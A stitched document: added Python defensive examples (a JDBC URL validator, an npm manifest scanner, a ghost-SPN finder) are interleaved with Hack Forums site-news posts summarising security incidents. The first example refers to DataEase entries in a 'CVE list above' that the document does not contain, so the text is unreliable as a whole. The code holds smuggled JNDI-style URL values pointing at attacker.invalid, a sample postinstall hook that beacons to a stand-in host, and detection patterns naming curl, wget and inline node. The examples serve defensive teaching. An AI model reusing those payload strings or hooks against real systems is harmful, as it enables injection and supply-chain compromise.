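The two DataEase entries in the CVE list above describe one pattern: a connection string built from user input is filtered by a deny-list of dangerous schemes (ldap://, ldaps://), and a scheme the list forgot (dns://) walks straight through. The check below is an added example, not DataEase code and not a description of its actual filter; it puts a deny-list check of that shape beside an allow-list parser that refuses any embedded URI scheme at all. The function names, the allowed driver and parameter lists, and the sample URLs (with the reserved host attacker.invalid) are constructed for the illustration.

```python
"""Deny-list versus allow-list validation of a user-supplied JDBC URL.

Added example, not DataEase code. It illustrates the filter-bypass class
behind CVE-2025-64163/64164: a deny-list of ldap:// and ldaps:// lets
dns:// (or rmi://) through, while an allow-list parser refuses any
embedded URI scheme. Function names, the allowed driver list, the
allowed parameter names and the sample URLs are constructed here.
"""
import re
from urllib.parse import parse_qs, urlsplit

# The kind of deny-list that CVE-2025-64163 describes as bypassable.
DENIED_SCHEMES = ("ldap://", "ldaps://")

# Allow-list for the hardened check (deployment-specific; constructed).
ALLOWED_DRIVERS = {"mysql", "postgresql"}
ALLOWED_PARAMS = {"user", "password", "database", "sslmode"}
HOST_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?$")


def denylist_accepts(url: str) -> bool:
    """Naive check: accept unless a denied scheme appears anywhere in the URL."""
    lowered = url.lower()
    return not any(scheme in lowered for scheme in DENIED_SCHEMES)


def allowlist_check(url: str) -> tuple[bool, str]:
    """Hardened check: parse the URL and accept only known-good shapes.

    Returns (accepted, reason) so callers can log why a URL was refused.
    """
    if not url.lower().startswith("jdbc:"):
        return False, "not a jdbc: URL"
    driver, sep, remainder = url[len("jdbc:"):].partition("://")
    if not sep:
        return False, "missing '://' after driver name"
    if driver.lower() not in ALLOWED_DRIVERS:
        return False, f"driver {driver!r} not allowed"
    # A second scheme separator means a URI is embedded in the host, path or
    # parameters (dns://, rmi://, ldap://, ...). Refuse it whatever the scheme
    # is, so there is no list for an attacker to find a gap in.
    if "://" in remainder:
        return False, "embedded URI scheme in host/path/parameters"
    parts = urlsplit("//" + remainder)
    try:
        host, _port = parts.hostname, parts.port   # .port raises on a bad port
    except ValueError:
        return False, "malformed port"
    if not host or not HOST_RE.match(host):
        return False, f"host {host!r} is not a plain DNS name"
    if parts.username or parts.password:           # credentials go in parameters
        return False, "userinfo in authority"
    for key, values in parse_qs(parts.query, keep_blank_values=True).items():
        if key.lower() not in ALLOWED_PARAMS:
            return False, f"parameter {key!r} not allowed"
        if any(re.search(r"[:/\\]", v) for v in values):
            return False, f"parameter {key!r} carries a path or scheme"
    return True, "ok"


# Constructed sample inputs: one benign URL and three with a JNDI-style
# scheme smuggled into a query parameter.
SAMPLE_URLS = {
    "benign": "jdbc:mysql://db.internal:3306/app?user=reporting",
    "ldap":   "jdbc:mysql://db.internal:3306/app?user=x&factory=ldap://attacker.invalid/a",
    "dns":    "jdbc:mysql://db.internal:3306/app?user=x&factory=dns://attacker.invalid/a",
    "rmi":    "jdbc:mysql://db.internal:3306/app?user=x&factory=rmi://attacker.invalid/a",
}


def compare(urls: dict[str, str] = SAMPLE_URLS) -> dict[str, tuple[bool, bool]]:
    """Return {label: (deny-list accepts, allow-list accepts)} for each URL."""
    return {label: (denylist_accepts(u), allowlist_check(u)[0]) for label, u in urls.items()}


if __name__ == "__main__":
    for label, (deny, allow) in compare().items():
        print(f"{label:7s} deny-list accepts={deny!s:5s} allow-list accepts={allow}")
```

On the sample set the deny-list refuses only the ldap:// URL and accepts both dns:// and rmi://; the allow-list refuses all three. The design point is that the hardened check never asks "is this scheme bad?", it asks "is this exactly a driver I expect, a hostname, and parameters I know?", which is the only shape of filter that does not need updating each time a new JNDI-capable scheme turns up.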

  Vacation
Posted by: Omniscient - Nov 9, 2025 10:57 PM - Forum: Site News - Replies (31)

I was away this weekend in Santa Barbara, California from Wednesday till Sunday.

[Image: fkHQSuV.png]

Had a nice short vacation. I'm back. Will be catching up on any contacts asap.

First real vacation I've had in a while. I played a couple rounds of golf, ate well (no Keto diet on vacation), went to a couple neighborhood bars, and walked the beach and most of downtown Santa Barbara. Very nice town.

Anyways, back to reality.

Print this item

  Hack Forum News - Edition 21
Posted by: Mix - Nov 3, 2025 12:47 PM - Forum: Site News - Replies (23)

[Image: 3-gray.png]

Hack Forum News - Edition 21

Welcome back to the Hack Forum News. Where we keep you up to date on the weekly events and news happening on site and around the world. If you have never heard of the Hack Forum News, don't worry, we have you covered. We are a team of members from the Hack Forums community who are journalists and writers, and we are here to keep you in the loop of the changes around the site and the events happening around the world.



[Image: headlines-red.png]
Writer - [mention=2331053]

Animated Sales Tags By [mention=1]

[mention=1] has recently updated our sales tags for the site and added some lovely animated versions and removed a few old ones. [mention=776749] is the artist behind these, and they look like they have made a great addition to the site. Go and share what you think on the thread.

Hack Forums News Team - Become a Writer By [mention=2331053]

Are you looking to join the HF news team? Do you enjoy making threads or even want to become a better writer? Well, we are looking for members of the site to help write each week and are looking for anyone who has any interest. We have a few new sections opening up right now, and we would love for you to see if they would be anything of interest to you. If you are interested, please check out the thread or contact [mention=2331053] to discuss joining the team behind the HF News.

HF UNIVERSAL TRANSLATOR By [mention=5680404]

[mention=5680404] has created another great new tool for the site with their universal translator. This tool will allow more members to interact on site even if they don't understand English too well.



[Image: statistics-magenta.png]
Writer - [mention=2331053]

[Image: 74affadcc69e708053e67cf55c2ee961.png]

Last Week:



[Image: awards-yellow.png]
Writer - [mention=2331053]


[mention=139820] Has obtained the "King Decade" award
[mention=5646157] Has obtained the "Dicey" award
[mention=5646157] Has obtained the "Stanley Fan" award
[mention=4931690] Has obtained the "Flip Reaper" award
[mention=234024] Has obtained the "Flip Reaper" award
[mention=5655318] Has obtained the "Quickly Loved" award
[mention=4225267] Has obtained the "Octoberfest 2025" award
[mention=5594002] Has obtained the "Octoberfest 2025" award
[mention=5646157] Has obtained the "Octoberfest 2025" award
[mention=1893427] Has obtained the "Octoberfest 2025" award
[mention=463848] Has obtained the "Octoberfest 2025" award




[Image: notable.png]
Writer - [mention=5655318]

The Best Of Octoberfest! Every Member With All 5 Pumpkin Awards From 2021-2025! - by [mention=666]

Octoberfest 2025 has wrapped up, marking the fifth consecutive year of this community-favorite event. With a unique pumpkin award released annually, only nine members have managed to collect all five, showing a true sign of dedication. This year was also the first time the award could be purchased, but most of these veterans still earned it the old-fashioned way. A great celebration of consistency, community, and a little competitive spirit that keeps the HF vibe alive each Octoberfest.

Would you rather know your death date or your cause of death? - by [mention=5]

A thought-provoking (and slightly chilling) question that got members talking: if you could know your death date or your cause of death, which would you choose? OP leans toward knowing the date - a way to stop fearing the unknown. The thread sparked some really interesting responses as users weighed control versus curiosity. One of those simple "what ifs" that turns into a surprisingly human discussion.

Reviving HackForums - by [mention=1631830]

A heartfelt post reflecting the nostalgia many HF veterans feel. OP wonders how both members and admins could work together to bring back the golden days - when threads and replies flowed endlessly. The discussion dives into the future of forums in the age of Social Media, Discord and Reddit, and what can still make HF stand out: community, creativity, and legacy.

Hackhf.net - by [mention=5705664]

Created by and for the community, Hackhf.net is an interactive puzzle and hacking challenge platform that rewards players with points as they solve missions. OP shares the frustration (and fun) of being stuck on one of the secret missions - a feeling many HF members can relate to. The site keeps the old-school hacking spirit alive, offering a playful and competitive twist that blends learning with pure curiosity. Make sure to dive in and share your journey!

GPT, Grok, Claude for Coding? - by [mention=2008714]

OP opens a practical discussion on AI tools for developers, comparing GPT, Grok, and Claude for coding workflows. After two years of using GPT, he notes its reliability but also its overly apologetic nature, sparking others to share their experiences and preferences. The thread highlights how integrated AI has become in day-to-day development and how each model brings its own flavor to the coding table. Join the discussion and share your experience!


The Lounge Mystery: Solve the puzzle, earn money & more - by [mention=5699805]

A forum-wide puzzle hunt with real stakes: OP challenges you to reach the end by uncovering ten hidden fragments, each holding a key only visible if you spot the pattern. Level 1, The Reflection, points to a Pastebin gate; you need the password to access it. Keep it simple: think light, think easy. Submit the key privately; silence is part of the test. The first five Level-1 solvers get marked, and once they report in, Level 2 opens. Finish all 10 levels to claim a symbolic $10 in crypto, and access to something far more valuable waiting at the true end. Ready to play?



[Image: groups-yellow.png]
Writer - [mention=3929084]

GROUPS FOR SALE AND SOLD

Succubus group is still listed for sale by [mention=3604010]
Olympians group & Benevolence are still listed for sale by [mention=1342286]

Mystery Inc listed for sale by [mention=3909991]


RECENT GROUP CHANGES & EVENTS

xadamxk has been added as a leader for Warriors

RECRUITMENTS:

Casino Recruitment
Pink LSZ Recruitment
Warriors Recruitment
Gamblers Recruitment
Legends Recruitment
Allegiance Buy-in
Olympians leader recruitment
The Academy Recruitment



[Image: user-gray.png]
Writer - [mention=2331053]

[mention=777] was closed.


Remember if you have reached an achievement on your account feel free to post about it on our weekly reports thread. That way we can add you to the news for the next edition. Click Here To See The Weekly Reports Thread




[Image: music-header.png]
Writer - [mention=2331053]

Recently we introduced a brand-new section to the HF News. This section will grow over time to include more things, but for now we are just going to be doing Song of the Week. We are open to suggestions for what more we could bring to the section, but as a start, we feel adding the Song of the Week is a great way to open the section and lead the way for more things in the future.

Now we know some of you may question what the Song of the Week is all about, and we have thought about what a good answer would be. We feel the Song of the Week should be a meaningful song that goes deeper than just general music and has real meaning to it. Granted, we may have a little fun with it sometimes. (Yes, we will have a Halloween version and a Christmas version too.) But we want to keep it at a level where the song has a true message behind it and is not just something everyone will see as another song that is a bit catchy or has a good few beats to it. We hope this helps those with that question, and if anyone has anything they wish to ask, please feel free to add it below. We are more than happy to give the reason behind it.

This week's Song Of The Week:






[Image: spec-ops.png]
Writer - [mention=5550319]

CISA Flags VMware Zero-Day Exploited by China-Linked Hackers

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a high-severity security flaw impacting Broadcom VMware Tools and VMware Aria Operations to its Known Exploited Vulnerabilities (KEV) catalog, following reports of active exploitation in the wild.

The vulnerability in question is CVE-2025-41244 (CVSS score: 7.8), which could be exploited by an attacker to attain root level privileges on a susceptible system.

"Broadcom VMware Aria Operations and VMware Tools contain a privilege defined with unsafe actions vulnerability," CISA said in an alert. "A malicious local actor with non-administrative privileges having access to a VM with VMware Tools installed and managed by Aria Operations with SDMP enabled may exploit this vulnerability to escalate privileges to root on the same VM."

The vulnerability was addressed by Broadcom-owned VMware last month, but not before it was exploited as a zero-day by unknown threat actors since mid-October 2024, according to NVISO Labs. The cybersecurity company said it discovered the vulnerability earlier this May during an incident response engagement.

Read more - https://thehackernews.com/2025/10/cisa-f...ed-by.html

Proton trains new service to expose corporate infosec cover-ups


Some orgs would rather you not know when they've suffered a cyberattack, but a new platform from privacy-focused tech firm Proton will shine a light on the big breaches that might otherwise stay buried.

Launched on Thursday, Proton's Data Breach Observatory aims to scour the dark web for details of breaches that don't reach the likes of regulators' portals, or those that the affected organization simply hasn't acknowledged.

Proton said in its announcement that the Data Breach Observatory will launch with a roundup of 2025's incidents to date, identifying 300 million individual records across 794 attacks.

Excluded from these are the often lofty figures associated with infostealer dumps, which typically garner the clickiest headlines but concern data that is routinely duplicated, old, or otherwise mundane.

The Data Breach Observatory will feature only attacks that targeted lone organizations rather than such aggregated cases. Without this exclusion, the number of incidents it would have collected would be nearly double, and the number of affected records would be in the hundreds of billions, Proton said.

The Swiss privacy biz said there isn't enough transparency around data breaches, and there is a growing market on the dark web for stolen details, such as credentials and sensitive personal information.

In 49 percent of cases examined so far this year, passwords featured among the leaked datasets, and sensitive stuff like records related to government services or healthcare were found in more than a third (34 percent).

Read more - https://www.theregister.com/2025/10/30/p...servatory/

UNC6384 Weaponizes ZDI-CAN-25373 Vulnerability to Deploy PlugX Against Hungarian and Belgian Diplomatic Entities


Arctic Wolf Labs has identified an active cyber espionage campaign by Chinese-affiliated threat actor UNC6384 targeting European diplomatic entities in Hungary, Belgium, and additional European nations during September and October 2025. The campaign represents a tactical evolution incorporating the exploitation of ZDI-CAN-25373, a Windows shortcut vulnerability disclosed in March 2025, alongside refined social engineering leveraging authentic diplomatic conference themes.

The attack chain begins with spearphishing emails containing an embedded URL that is the first of several stages that lead to the delivery of malicious LNK files themed around European Commission meetings, NATO-related workshops, and multilateral diplomatic coordination events. These files exploit the recently disclosed Windows vulnerability to execute obfuscated PowerShell commands that extract and deploy a multi-stage malware chain, culminating in PlugX remote access trojan (RAT) deployment through DLL side-loading of legitimate signed Canon printer assistant utilities.

Read more - https://arcticwolf.com/resources/blog/un...loy-plugx/

Major US Telecom Backbone Firm Hacked by Nation-State Actors

Ribbon provides communications and networking solutions that enable organizations to reliably run phone calls and data networks.

The firm says its solutions are used by service providers, enterprises and critical infrastructure organizations. Its website lists BT, Verizon, Deutsche Telekom, CenturyLink, TalkTalk, Softbank, and Tata as its customers, along with the US Department of Defense and the City of Los Angeles.

In a quarterly financial report submitted recently to the SEC, Ribbon said it discovered unauthorized access to its IT network in early September 2025.

An investigation showed that the hackers may have gained initial access as early as December 2024, but the probe is still ongoing.

Ribbon has not shared any technical details on the incident, but said a nation-state threat actor is believed to be behind the attack.

Read more - https://www.securityweek.com/major-us-te...te-actors/

A federal judge has ordered spyware maker NSO to stop using its Pegasus app to target or infect users of WhatsApp.


The ruling, issued Friday by Phyllis J. Hamilton of the US District Court of the District of Northern California, grants a permanent injunction sought by WhatsApp owner Meta in a case it brought against NSO in 2019. The lawsuit alleged that Meta caught NSO trying to surreptitiously infect about 1,400 mobile phones—many belonging to attorneys, journalists, human-rights activists, political dissidents, diplomats, and senior foreign government officials—with Pegasus. As part of the campaign, NSO created fake WhatsApp accounts and targeted Meta infrastructure. The suit sought monetary awards and an injunction against the practice.

Read more - https://arstechnica.com/security/2025/10...s-spyware/

Exploiting Ghost SPNs and Kerberos Reflection for SMB Server Privilege Elevation


Kerberos authentication reflection can be abused for remote privilege escalation, even after applying the fix for CVE-2025-33073.

Ghost SPNs (Service Principal Names mapped to hostnames that fail to resolve) introduce an exploitable attack surface that adversaries can leverage.

Default Active Directory (AD) settings allow standard users to register DNS records, enabling this attack, which Microsoft has cataloged as CVE-2025-58726 (SMB Server Elevation of Privilege).

Failure to enforce SMB signing is a critical enabler. The attack works on all Windows versions unless SMB signing is required.

Microsoft addressed this issue in the October 2025 Patch Tuesday.

Kerberos is widely used for secure authentication in Windows environments. However, when misconfigured Service Principal Names (SPNs) and default permissions align, attackers can exploit Kerberos reflection to gain SYSTEM-level access remotely.

We reported these findings to the Microsoft Security Response Center (MSRC) in June 2025. Microsoft released a security update for the issue, cataloged as CVE-2025-58726, in October 2025. Understanding how attackers exploit gaps in SPN and authentication security can help prevent similar vulnerabilities.

Read more - https://www.semperis.com/blog/exploiting...elevation/

Millions Impacted by Conduent Data Breach

The incident was disclosed publicly in late January, when Conduent confirmed system disruptions that affected government agencies in multiple US states.

In April, the company notified the Securities and Exchange Commission (SEC) that the attackers had stolen personal information from its systems.

Last week, Conduent started notifying users that their personal information was stolen in the incident, and submitted notices to Attorney General’s Offices in multiple states.

The hackers accessed Conduent’s network on October 21, 2024 and were evicted on January 13, 2025, after the attack was identified, the company says in the notification letter to the affected individuals.

During that time, the attackers exfiltrated various files, including names, addresses, dates of birth, Social Security numbers, health insurance details, and medical information.

Conduent is not providing the affected people with free identity theft protection services, but encourages them to obtain free credit reports, place fraud alerts on their credit files, and place security freezes on their credit reports.

Read more - https://www.securityweek.com/millions-im...ta-breach/

EY exposes 4TB+ SQL database to open internet for who knows how long

A Dutch cybersecurity outfit says its lead researcher recently stumbled upon a 4TB+ SQL Server backup file belonging to EY exposed to the web, effectively leaking the accounting and consulting megacorp's secrets.

Among the BAK file's data were API keys, cached authentication tokens, session tokens, service account passwords, and user credentials, Neo Security's writeup explained.

"Finding a 4TB SQL backup exposed to the public internet is like finding the master blueprint and the physical keys to a vault, just sitting there," it said. "[The lead researcher had] investigated breaches that started with less. Way less. He once traced an entire ransomware incident back to a single web.config file that leaked a connection string. That was 8 kilobytes. This was four terabytes."

The researcher, who was not named in the company's report, downloaded the first thousand bytes of the file and found that the BAK file was also unencrypted.

It became exposed via a classic cloud bucket misconfiguration. Neo Security said the case was reminiscent of a similar breach it saw years ago when investigating a ransomware case.

Read more - https://www.theregister.com/2025/10/29/e..._database/

PhantomRaven: NPM Malware Hidden in Invisible Dependencies

126 malicious npm packages. Over 86,000 downloads. Actively stealing npm tokens, GitHub credentials, and CI/CD secrets from developers worldwide - all while hiding the malicious code in dependencies hidden from the dependency analysis that most security tools rely on.

They're calling this campaign PhantomRaven.

Packages making external network requests during installation - all to the same suspicious domain - were discovered in October 2025. Sequential email accounts (jpdtester01@hotmail[.]com → jpdtester13@gmail[.]com) and predictable usernames indicated a single operator controlling the campaign.

Malicious code was hidden in invisible dependencies that get fetched at install time. The packages themselves often appeared harmless, e.g., a simple hello world script.

Read more - https://www.koi.ai/blog/phantomraven-npm...pendencies

Latest Critical CVEs


CVE-2025-61932: A vulnerability in LANSCOPE Endpoint Manager on-premises (Client program MR and Detection Agent DA) where improper verification of the origin of incoming requests allows remote code execution via specially crafted packets.

CVE-2025-54236: A flaw in Adobe Commerce / Magento Open Source (dubbed “SessionReaper”) involving improper input validation of the REST API, enabling unauthenticated session takeover and potentially remote code execution.

CVE-2025-59287: A critical remote code execution vulnerability in Windows Server Update Services (WSUS) caused by unsafe deserialization of untrusted data in the AuthorizationCookie or ReportingWebService, allowing unauthenticated attackers to execute code with SYSTEM privileges.



[Image: tech-brown.png]
Writer - [mention=5465469]

183 million email passwords exposed in massive data leak including millions of Gmail accounts
Security researcher Troy Hunt of HaveIBeenPwned reports a 3.5 TB credential dump including over 183 million unique entries, of which about 16.4 million had not appeared in any prior breach. The leak is attributed to infostealer malware and affects Gmail, Yahoo, Outlook and more.
Source

Microsoft issues out of band update to mitigate critical WSUS vulnerability under active exploitation
Cybersecurity and Infrastructure Security Agency (CISA) alerts organizations to apply the October 23, 2025 patch for a WSUS remote code execution vulnerability (CVE-2025-59287) now exploited in the wild.
Source

Auto sector cyber risk surges as manufacturing disruption becomes strategic target
A recent study shows the automobile industry faces historic cyber threats, with the Jaguar Land Rover breach cited as a major warning. Supply chain disruption, factory shutdowns and cascading vendor impacts highlight the systemic danger.
Source

U.S. government data hub targeted, breach hits FEMA & CBP via Citrix exploit
A breach of Federal Emergency Management Agency (FEMA) Region 6 network and U.S. Customs and Border Protection (CBP) employee data stemmed from a Citrix NetScaler Gateway memory disclosure bug (CVE-2025-5777). The incident underscores the ongoing vulnerability of federal systems.
Source

Exploit chain shift, IT and OT convergence and Zero Trust urgency dominate breach summaries for October 2025
Cyber attack reports from Xage indicate that the boundary between IT and OT environments is collapsing, with double the rate of nationally significant incidents in the UK compared to 2024. The shift signals mounting demand for proactive Zero Trust models.
Source

Print this item
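The PhantomRaven item above turns on where the malicious code lived: not in the package that was installed, but in a dependency that npm fetched from a URL at install time, which is why tooling that only reads the registry metadata or the lockfile's package names did not see it. The scanner below is an added example, not Koi's tooling and not code from any PhantomRaven package: it reads a package.json and flags dependency specifiers that point at a URL or git host instead of a registry version range, plus install-time lifecycle scripts that run inline code or network tools. The manifest it scans is constructed, including the hypothetical host packages.example.invalid, and the regexes are a starting point rather than a complete catalogue of npm specifier forms.

```python
"""Flag npm manifest entries that pull code from outside the registry at
install time: URL-style dependency specifiers and lifecycle scripts that
run inline code or network tooling.

Added example, not Koi's tooling and not code from any PhantomRaven
package. The manifest below is constructed, including the hypothetical
host packages.example.invalid; the patterns are a starting point, not a
complete list of npm specifier forms.
"""
import json
import re

DEPENDENCY_SECTIONS = ("dependencies", "devDependencies",
                       "optionalDependencies", "peerDependencies")
LIFECYCLE_SCRIPTS = ("preinstall", "install", "postinstall", "prepare")

# Specifiers npm resolves to something other than a registry tarball.
REMOTE_SPEC_RE = re.compile(
    r"^(?:https?://|git(?:\+\w+)?://|github:|gitlab:|bitbucket:|gist:)", re.I)
# Local specifiers are not remote, but are excluded explicitly so that a
# path containing '://' is not misreported.
LOCAL_SPEC_RE = re.compile(r"^(?:file:|link:|workspace:)", re.I)
# Inline code or network tooling inside an install hook.
SUSPICIOUS_SCRIPT_RE = re.compile(
    r"""(?:\bnode\s+-e\b|\bcurl\b|\bwget\b|Invoke-WebRequest|require\(['"]https?['"]\)|\bfetch\()""",
    re.I,
)


def find_remote_dependencies(manifest: dict) -> list[tuple[str, str, str]]:
    """Return (section, package name, specifier) for each non-registry dependency."""
    found = []
    for section in DEPENDENCY_SECTIONS:
        for name, spec in manifest.get(section, {}).items():
            if REMOTE_SPEC_RE.match(spec) or (not LOCAL_SPEC_RE.match(spec) and "://" in spec):
                found.append((section, name, spec))
    return found


def find_suspicious_scripts(manifest: dict) -> list[tuple[str, str]]:
    """Return (hook name, command) for install-time hooks matching the pattern."""
    scripts = manifest.get("scripts", {})
    return [(hook, scripts[hook]) for hook in LIFECYCLE_SCRIPTS
            if hook in scripts and SUSPICIOUS_SCRIPT_RE.search(scripts[hook])]


def scan_manifest(text: str) -> dict:
    """Parse a package.json string and summarise what needs a human look."""
    manifest = json.loads(text)
    remote = find_remote_dependencies(manifest)
    scripts = find_suspicious_scripts(manifest)
    return {"name": manifest.get("name"), "remote_dependencies": remote,
            "suspicious_scripts": scripts, "needs_review": bool(remote or scripts)}


# Constructed manifest: looks like a trivial package, but one dependency is
# fetched over HTTP from an arbitrary host and postinstall runs inline code.
SAMPLE_MANIFEST = r"""{
  "name": "hello-world-demo",
  "version": "1.0.0",
  "scripts": {
    "postinstall": "node -e \"require('http').get('http://packages.example.invalid/beacon')\""
  },
  "dependencies": {
    "express": "^4.19.2",
    "ui-styles-helper": "http://packages.example.invalid/npm/unused-imports",
    "local-lib": "file:../local-lib"
  },
  "devDependencies": {
    "eslint": "~9.0.0",
    "some-tool": "github:someorg/some-tool"
  }
}"""


if __name__ == "__main__":
    print(json.dumps(scan_manifest(SAMPLE_MANIFEST), indent=2))
```

Run against the sample it reports ui-styles-helper and some-tool as non-registry dependencies and postinstall as a suspicious hook, while express, eslint and the file: dependency pass. Two caveats a practitioner should keep in mind: a URL specifier tells you nothing about what the server returns on the day of the install, so the finding is "go and look", not "this is malicious"; and `npm install --ignore-scripts` stops the hook from running but does not stop the remote tarball from being fetched and placed in node_modules.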
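The Kerberos reflection item above names the precondition defenders can actually hunt for before patching: "ghost" SPNs, servicePrincipalName values whose host part no longer resolves, which an attacker can re-point by registering the name in DNS. The script below is an added example, not Semperis's or Microsoft's tooling: it parses SPNs, qualifies short host names under a domain suffix, checks each host once, and lists the ones that do not resolve. The SPN inventory, the suffix corp.example and the fake resolver in the demo are constructed; in production you would feed it the servicePrincipalName attribute from an LDAP query and let it use the real resolver.

```python
"""List 'ghost' SPNs: servicePrincipalName values whose host part no longer
resolves in DNS, the precondition described in the Kerberos reflection
write-up above.

Added example, not Semperis's or Microsoft's tooling. The SPN inventory,
the domain suffix corp.example and the resolver used in the demo are all
constructed; in production feed it real LDAP output and real DNS.
"""
import re
import socket
from collections.abc import Callable

# service/host[:port][/instance]; host may be a short name or an FQDN.
SPN_RE = re.compile(
    r"^(?P<service>[^/]+)/(?P<host>[^:/]+)(?::(?P<port>\d+))?(?:/(?P<instance>.+))?$")


def parse_spn(spn: str) -> dict | None:
    """Split an SPN into its parts, or return None if it is malformed."""
    m = SPN_RE.match(spn)
    return m.groupdict() if m else None


def qualify(host: str, domain_suffix: str) -> str:
    """Turn a short host name into an FQDN under the domain; leave FQDNs alone."""
    host = host.lower().rstrip(".")
    return host if "." in host else f"{host}.{domain_suffix.lower()}"


def dns_resolves(fqdn: str) -> bool:
    """Real resolver for production use; the demo below injects a fake one."""
    try:
        socket.gethostbyname(fqdn)
        return True
    except socket.gaierror:
        return False


def find_ghost_spns(spns_by_account: dict[str, list[str]], domain_suffix: str,
                    resolves: Callable[[str], bool] = dns_resolves) -> list[dict]:
    """Return one record per SPN whose host does not resolve."""
    ghosts = []
    checked: dict[str, bool] = {}            # cache: one lookup per host
    for account, spns in spns_by_account.items():
        for spn in spns:
            parsed = parse_spn(spn)
            if not parsed:
                continue                      # malformed SPN; report separately if needed
            fqdn = qualify(parsed["host"], domain_suffix)
            if fqdn not in checked:
                checked[fqdn] = resolves(fqdn)
            if not checked[fqdn]:
                ghosts.append({"account": account, "spn": spn, "host": fqdn})
    return ghosts


# Constructed inventory, shaped like the servicePrincipalName attribute from
# an LDAP query, plus a fake resolver standing in for corporate DNS.
SAMPLE_SPNS = {
    "svc-sql": ["MSSQLSvc/sql01.corp.example:1433", "MSSQLSvc/oldsql.corp.example:1433"],
    "WS01$": ["HOST/ws01", "HOST/ws01.corp.example", "RestrictedKrbHost/ws01"],
    "svc-web": ["HTTP/decommissioned-web"],
}
KNOWN_HOSTS = {"sql01.corp.example", "ws01.corp.example"}


def demo() -> list[dict]:
    """Run the check over the constructed inventory with the fake resolver."""
    return find_ghost_spns(SAMPLE_SPNS, "corp.example", resolves=lambda h: h in KNOWN_HOSTS)


if __name__ == "__main__":
    for g in demo():
        print(f"{g['account']:10s} {g['spn']:40s} -> {g['host']} does not resolve")
```

On the sample data it flags the stale MSSQLSvc entry on svc-sql and the HTTP SPN on svc-web. A ghost SPN on its own is a hygiene finding; per the write-up it becomes a privilege-escalation path when standard users can still register DNS records (the AD default) and SMB signing is not required, so the output is best read alongside those two settings and the October 2025 update status.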